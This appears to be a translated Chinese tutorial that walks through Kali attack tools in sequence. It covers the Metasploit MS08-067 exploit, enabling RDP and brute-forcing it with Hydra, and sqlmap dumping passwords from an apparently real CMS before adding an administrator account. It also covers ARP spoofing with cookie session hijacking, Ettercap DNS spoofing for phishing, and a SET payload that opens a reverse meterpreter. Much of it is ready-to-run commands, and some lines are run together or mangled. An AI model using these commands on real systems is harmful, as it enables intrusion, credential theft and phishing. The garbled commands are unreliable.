量子哈希
Rank: great Description: MS08-067 Microsoft Server Service Relative Path Stack Corruption Use the “use” command to invoke the MS08-067 vulnerability exploit program use exploit/windows/smb/ms08067netapi Use the “show options” command to view the required settings
From the diagram, it can be seen that the RHOST (target address) and Exploit target need to be set. Use the “set” command to set Module Options, in this case, set RHOST 172.16.211.129. After setting, use the “show options” command to check the settings
It can be seen that the target IP has been set. Next, set the Exploit target. Use the “show targets” command to view the available options. It can be seen that this vulnerability exists in the following versions of the system. Since the demonstrated instance is WinXP SP3 Simplified Chinese version, it is
Use the “set target” command to set the target, in this case, set target 34. After setting, use the “show options” command to check if all settings are completed. Then use the “exploit” or “run” command to launch the attack. After executing the “exploit” command, a meterpreter is obtained
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
In the meterpreter, enter “shell” to access the CMD window. Then you can execute CMD commands, such as opening RDP service. Use the “netstat -an” command to check if the port is open. From the diagram, it can be seen that it is already open. Then use the “net user” command to view the users in the XP system
hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt
rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389
sqlmap -u "http://url/news?id=1" --current-user It can be seen that there is a user named “sysorem”. Then, for a specific user, such as the “sysorem” user here, perform a login password brute force. Use Hydra to brute force the password: 12345, then you can directly log in to XP for remote control. SQLmap SQLmap is an automated SQL injection tool that scans, detects, and exploits SQL injection vulnerabilities in a given URL. It currently supports databases such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, and SAP MaxDB. It uses five unique SQL injection techniques: 1) Boolean-based blind injection, which injects based on the true or false condition of the returned page. 2) Time-based blind injection, which cannot determine any information based on the returned page content, but judges by observing the delay in time execution (whether the page return time increases). 3) Error-based injection, which returns error messages or directly displays the results of the injected statement on the page. 4) Union-based injection, which can be used when the union is available. 5) Stacked queries injection, which can execute multiple statements at the same time. Summary: Introduction to commonly used syntax. Demonstration: Intrusion into a server through an injection point. Introduction to commonly used syntax. Get the current username
sqlmap -u "http://www.xxoo.com/news?id=1" —current-dbsqlmap -u "http://www.xxoo.com/news?id=1" --tables -D “db_name”sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0sqlmap -u "http://xxx/newsInfo.php?news_id=1&classsn=8001" --level 2news_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b766271,0x5a794e4d4a626f5857704c4959506c49507a58666b4c44717864664b596d586d797059515752464d,0x716a786b71),NULL,NULL-- PHML&classsn=9003sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --current-userGet the current database name. List the table names. List the column fields. Get the field content. Demonstration: Intrusion into a server through an injection point. Target website: a certain CMS. Test for injection. Payload. Query the database owner user, returns “ht_zhengke20%”
sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --is-dba 
sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --dbs
sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --users
sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --passwords
sqlmap -u “http://xxx/newsInfo.php?news_id=1&classsn=8001” --sql-shellCheck if it is an administrator account, returns true. List databases. List database users. List database user passwords. The plaintext password of the “htzhengke2″ user is “htzhengke2″. Nmap scan discovers port 3389 is open. Enter SQL shell
In the SQL shell, add a user and elevate to administrator. net user root 12345 /add net localgroup administrators root /add Use the newly added user to remotely log in to the server
Arpspoof In a local area network, network traffic is not transmitted based on IP addresses but based on MAC addresses. Therefore, if the MAC address on A is forged as a nonexistent MAC address, it will cause network interruption, and A cannot ping C. This is a simple ARP spoofing, exploiting the vulnerability of the ARP protocol. It is often used in internal network penetration, and can be combined with other tools for network sniffing, traffic hijacking, etc.
arpspoof [-i interface] [-t target] hostecho 1 >> /proc/sys/net/ipv4/ip_forwardExample application: ARP spoofing attack and session hijacking. ARP network interruption attack. Command structure: -i for network card, -t for target. ARP spoofing attack. Windows XP SP3 IP: 172.16.211.129 Kali Linux IP: 172.16.211.128 Gateway IP: 172.16.211.2 Enable IP forwarding (can use “cat” to check if it is set successfully)
arpspoof -i eth0 -t 172.16.211.129 172.16.211.2
Redirect victim’s traffic to the attacker. Capture packets with tcpdump (can also use Wireshark). Since the gateway has routing capabilities, capturing local network card traffic can obtain the target host’s traffic. Simple usage: tcpdump -w cookie.cap # Capture all traffic and write to cookie.cap. Perform ARP spoofing for a period of time, during which you can browse web pages, chat, etc. For example, now access “数字杭电” (a website), stop spoofing and packet capture after a period of time, and use ferret to process the captured traffic. Simple usage: ferret -r cookie.cap # Process the captured traffic
Hamster After ensuring that the processed cookie.cap is in the root user’s directory, run hamster. Then set the browser proxy according to the prompts. Set the proxy for the built-in Firefox browser in Kali as shown in the diagram. After setting the proxy, access hamster or :1234 in the browser
arpspoof -i eth0 172.16.211.1 172.16.211.128
Click on the left link, and the cookie hijacking is successful, achieving access. ARP network interruption attack. Disable local IP forwarding, so when the traffic from the gateway reaches the local machine, the target machine cannot receive data from the gateway, resulting in “network interruption”. Ettercap Ettercap is a powerful tool for deception, allowing testers to create and send forged packets, from network adapters to application software at various levels, and bind listening data to a local port, etc. It is a commonly used auxiliary tool in man-in-the-middle attacks.
Without further ado, interested friends can explore it themselves. Example demonstration: DNS spoofing (phishing) using MIMT. Configure DNS (/etc/ettercap/etter.dns). 172.16.211.128 is the local LAN address.
Enable local web service. Direct access will return the default Apache page. Use the command “ettercap -G” to start ettercap and select “Unifind sniffing” for NIC configuration. Then scan for live hosts and click on “Hosts list” in the diagram.
Add the gateway address to target1 and add the attack target to target2. Then set the form of man-in-the-middle attack as ARP spoofing and set bidirectional spoofing. Then enable the dns_spoof plugin. Then start DNS spoofing. When browsing on the target host, the spoofing effect can be achieved.
DNS spoofing is often used in internal network penetration to obtain administrator information, phishing, etc. For example, it can forge the internal network router management page and deceive users into entering real account passwords. SET SET is a toolkit that utilizes social engineering theory. It connects with Metasploit and automatically builds various environments applicable to social engineering techniques, such as the latest Microsoft vulnerabilities, Adobe PDF vulnerabilities, Java Applet vulnerabilities, etc. It is not only easy to use but also cleverly deceives ordinary users’ eyes. Therefore, it is an extremely dangerous tool. Enter “setoolkit” in the shell to start SET, which can be used for social engineering, penetration testing, etc. Here, select 1 for social engineering
Choose connection method 4 and create a payload and listener. Because the system used for demonstration is WinXP 32-bit, select connection method 2. Then set the local IP and port (set the port to 4445 here to avoid conflicts). Then SET will start MSF and use the set payloads. When the user is lured and reversely connects to port 4445 on this machine, a meterpreter will be obtained. After obtaining the meterpreter, you can enter “?” to view available commands
